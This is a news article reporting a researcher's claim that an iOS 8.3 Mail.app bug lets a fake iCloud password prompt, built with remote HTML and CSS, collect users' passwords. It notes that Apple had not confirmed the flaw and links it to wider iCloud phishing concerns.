iCloud two-step verification
Apple ID holders with two-step verification enabled may see a few more padlocks on their iCloud screens. Screenshot/Apple

Prepare to change your iOS password. A security researcher claims to have developed a way to send iCloud users fake phishing emails that, by exploiting a security bug in Apple's system, could make millions of customer passwords vulnerable.

Jan Soucek, a white hat hacker (meaning he uses his powers for good, not evil), built an iOS 8.3 Mail.app popup that looks just like the kind of messages Apple users normally see when they're asked to enter their password. Instead of giving an iCloud user access to their account, though, it enables hackers to take control of a target's computer. Apple has not verified that the security bug exists and Soucek did not hear back when he tried reporting the issue, according to the Register, a British tech publication.

“This bug allows remote HTML content to be loaded, replacing the content of the original email message,” Soucek wrote on a GitHub page where he also attached a video showing how the hack was made possible. “JavaScript is disabled in this UIWebView, but it is still possible to build a functional password 'collector' using simple HTML and CSS.”

Again, Apple has yet to confirm the hack is authentic and no iCloud users appear to have been affected by the security bug. But the issue again underscores how easily phishing attacks, in which hackers ask users to input their information into what appears to be a trusted page, can wreak havoc on someone's digital life. It's also another headache for the iCloud, which was exploited in the hack that led to hundreds of celebrity nude photos being posted online without their knowledge or permission.